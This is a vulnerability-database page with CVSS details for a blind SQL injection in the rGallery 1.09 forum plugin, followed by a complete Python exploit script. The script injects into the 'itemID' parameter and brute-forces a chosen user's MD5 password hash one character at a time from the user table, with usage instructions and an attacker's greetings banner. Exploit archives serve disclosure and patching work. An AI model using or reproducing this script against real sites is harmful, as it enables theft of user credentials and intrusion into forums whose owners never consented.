WBB Plugin rGallery 1.09 (itemID) Blind SQL Injection Exploit

2008.10.22
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

import sys, urllib2, re print "\n " print " \\#'#/ " print " (-.-) " print " -------------------oOO---(_)---OOo--------------------" print " | rGallery 1.09 (+-) Exploit by Five-Three-Nine |" print " | Using Blind SQL Injection in 'itemID' of rGallery |" print " | |" print " | Greets and Shouts to: |" print " | tmh, n00bor, activebeta, Ghost, Saufkumpel, Altair |" print " | crusader727, Nemo, Loader007, J0hn.X3r, sNiper109 |" print " ------------------------------------------------------\n" if len(sys.argv) != 5: print "\nUsage: ./rGallery.py <UserID> <UserTable> <ImageID> <site>" print "Ex: ./rGallery.py 1 bb1_users 19 http://example.com\n" sys.exit(1) UserID = sys.argv[1] Prefix = sys.argv[2] ImageID = sys.argv[3] Host = sys.argv[4] Res = [48,49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102] MD5 = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32] Hash = "" UserID = int(UserID) UserID -= 1 UserID = str(UserID) for MD5Count in range(32): for ResCount in range(16): try: source = urllib2.urlopen(Host +"/index.php?page=RGalleryImageWrapper&itemID=" + ImageID +"%20and%20ascii(substring((SELECT%20password%20from%20" + Prefix +"%20limit%20"+ UserID + ",1)," + str(MD5Count + 1) + ",1))="+ str(Res[ResCount])).read() print "[+] Character " + str(MD5Count + 1) + " found! " + str(Res[ResCount]) MD5[MD5Count] = Res[ResCount] break except(urllib2.URLError): continue except(urllib2.HTTPError): print "[+] Error: Can't load the Site" sys.exit(1) for i in MD5: Hash = Hash + str(chr(i)) print "\n[+] Hash: " + Hash


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top